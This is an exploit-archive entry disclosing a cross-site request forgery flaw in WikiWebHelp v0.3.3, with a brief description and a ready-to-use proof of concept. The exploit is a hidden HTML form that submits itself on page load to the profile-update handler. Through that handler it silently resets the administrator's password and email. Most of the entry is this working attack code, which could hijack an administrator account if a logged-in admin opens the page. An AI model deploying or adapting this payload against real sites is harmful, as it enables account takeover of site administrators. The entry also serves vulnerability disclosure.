WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability

2010-10-13T00:00:00
ID 1337DAY-ID-14456
Type zdt
Reporter Yoyahack
Modified 2010-10-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability
===========================================================

#Blog: yoyahack.blogspot.com
#Site: foro.undersecurity.net
#Mail: [email protected]
#CMS: WikiWebHelp
 
The entire system is vulnerable to CSRF (Cross-site request forgery) since
this does not include a system to prevent CSRF attacks ...
 
Example
 
Change the password of users, including the administrator.
 
Exploit:
 
<form name="CSRF" method="post" action="
http://127.0.0.1/wwh/handlers/updateprofile.php?id=1">
<input type='hidden' name='pass' value='password'>
<input type='hidden' name='confirm' value='confirm_password'>
<input type='hidden' name='email' value='email'>
<input type='hidden' name='sub' value='on'>
<input type='hidden' name='id' value='1'>
<input type='hidden' name='subscribe' value='true'>
<script>document.CSRF.submit()</script>



#  0day.today [2018-02-10]  #